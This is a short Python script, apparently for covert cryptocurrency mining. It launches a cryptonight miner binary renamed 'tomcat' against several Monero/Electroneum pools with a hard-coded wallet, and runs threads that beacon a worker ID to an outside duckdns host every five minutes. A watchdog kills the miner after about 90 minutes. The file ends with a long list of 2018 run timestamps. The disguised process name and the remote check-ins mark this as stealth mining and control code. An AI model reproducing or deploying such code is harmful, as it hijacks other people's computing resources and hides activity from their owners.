import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:24:06.210924
#2018-02-17 16:11:06.014553
#2018-02-17 17:58:07.266620
#2018-02-17 19:46:05.712903
#2018-02-17 21:35:05.957364
#2018-02-17 23:19:06.899342
#2018-02-18 01:07:07.692727
#2018-02-18 02:54:04.051548
#2018-02-18 04:43:07.213380
#2018-02-18 06:35:01.746873
#2018-02-18 08:22:05.257059
#2018-02-18 10:11:04.913463
#2018-02-18 11:57:04.846694
#2018-02-18 13:42:04.974103
#2018-02-18 15:33:01.728991
#2018-02-18 17:21:01.603807
#2018-02-18 19:09:07.144942
#2018-02-18 20:55:01.548982
#2018-02-18 22:40:08.402823
#2018-02-19 00:29:05.868950
#2018-02-19 02:14:07.030973
#2018-02-19 04:01:07.933535
#2018-02-19 05:45:01.570749
#2018-02-19 07:31:07.445918
#2018-02-19 09:21:08.398152
#2018-02-19 11:11:04.863934
#2018-02-19 12:58:04.815489
#2018-02-19 14:45:10.878829
#2018-02-19 16:34:02.173773
#2018-02-19 18:19:08.876051
#2018-02-19 20:05:02.704661
#2018-02-19 21:56:06.459023
#2018-02-19 23:41:08.354101
#2018-02-20 01:31:08.085958
#2018-02-20 03:19:04.342496
#2018-02-20 05:05:07.296894
#2018-02-20 06:48:01.700408
#2018-02-20 08:34:06.001781
#2018-02-20 10:18:06.325117
#2018-02-20 12:03:09.467883
#2018-02-20 13:51:01.427804
#2018-02-20 15:37:04.476361
#2018-02-20 17:23:10.409556
#2018-02-20 19:14:03.939981
#2018-02-20 21:02:05.658587
#2018-02-20 22:48:07.098613
#2018-02-21 00:32:04.146121
#2018-02-21 02:17:07.947146
#2018-02-21 04:04:03.537096
#2018-02-21 05:50:02.796096
#2018-02-21 07:37:03.980956
#2018-02-21 09:21:07.173281
#2018-02-21 11:11:02.152917
#2018-02-21 12:59:06.354100
#2018-02-21 14:46:02.308361
#2018-02-21 16:33:08.931071
#2018-02-21 18:22:10.075537
#2018-02-21 20:08:07.788741
#2018-02-21 21:57:04.683660
#2018-02-21 23:44:06.987548
#2018-02-22 01:34:05.032208
#2018-02-22 03:21:03.772970
#2018-02-22 05:07:06.119416
#2018-02-22 06:52:06.317177
#2018-02-22 08:39:01.408216
#2018-02-22 10:26:01.486930
#2018-02-22 12:11:07.266462
#2018-02-22 13:58:08.400469
#2018-02-22 15:47:11.717542
#2018-02-22 17:35:11.362632
#2018-02-22 19:21:06.398135
#2018-02-22 21:13:06.205731
#2018-02-22 22:59:04.395333
#2018-02-23 00:46:04.550485
#2018-02-23 02:33:07.423355
#2018-02-23 04:22:04.561360
#2018-02-23 06:07:01.362385
#2018-02-23 07:52:07.762076
#2018-02-23 10:09:06.560380
#2018-02-23 11:59:11.120495
#2018-02-23 13:48:01.774146
#2018-02-23 15:38:07.445734
#2018-02-23 17:26:06.715538
#2018-02-23 19:13:07.963811
#2018-02-23 20:57:06.735523
#2018-02-23 22:54:03.951964
#2018-02-24 00:39:08.139697
#2018-02-24 02:29:04.013670
#2018-02-24 04:20:07.079328
#2018-02-24 06:07:07.703356
#2018-02-24 07:55:06.534192
#2018-02-24 09:39:05.255541
#2018-02-24 11:35:02.091883
#2018-02-24 13:25:07.244560
#2018-02-24 15:14:05.470927
#2018-02-24 17:03:01.813915
#2018-02-24 18:55:04.773539
#2018-02-24 20:42:07.031453
#2018-02-24 22:51:06.649510
#2018-02-25 02:11:05.754956
#2018-02-25 05:39:07.532945
#2018-02-25 11:35:07.039464